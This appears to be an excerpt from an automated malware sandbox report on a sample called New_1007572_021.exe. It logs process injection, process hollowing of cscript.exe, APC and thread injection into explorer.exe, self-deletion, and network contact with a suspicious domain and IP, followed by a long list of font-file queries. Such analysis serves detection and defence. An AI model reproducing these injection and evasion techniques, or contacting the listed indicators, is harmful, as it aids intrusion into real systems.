            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]19_2_048C3B7A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 19_2_048C3B7A mov eax, dword ptr fs:[00000030h]19_2_048C3B7A
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: www.comfsresidential.com
            Source: C:\Windows\explorer.exeNetwork Connect: 185.53.178.50 80Jump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread register set: target process: 3424Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3424Jump to behavior
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: E0000Jump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 403000Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: 404000Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeMemory written: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe base: CAD008Jump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe' Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exeProcess created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe' Jump to behavior
            Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'Jump to behavior
            Source: explorer.exe, 0000000B.00000000.745550579.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 0000000B.00000000.784022003.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000013.00000002.925610456.0000000003460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Users\user\Desktop\New_1007572_021.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New_1007572_021.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
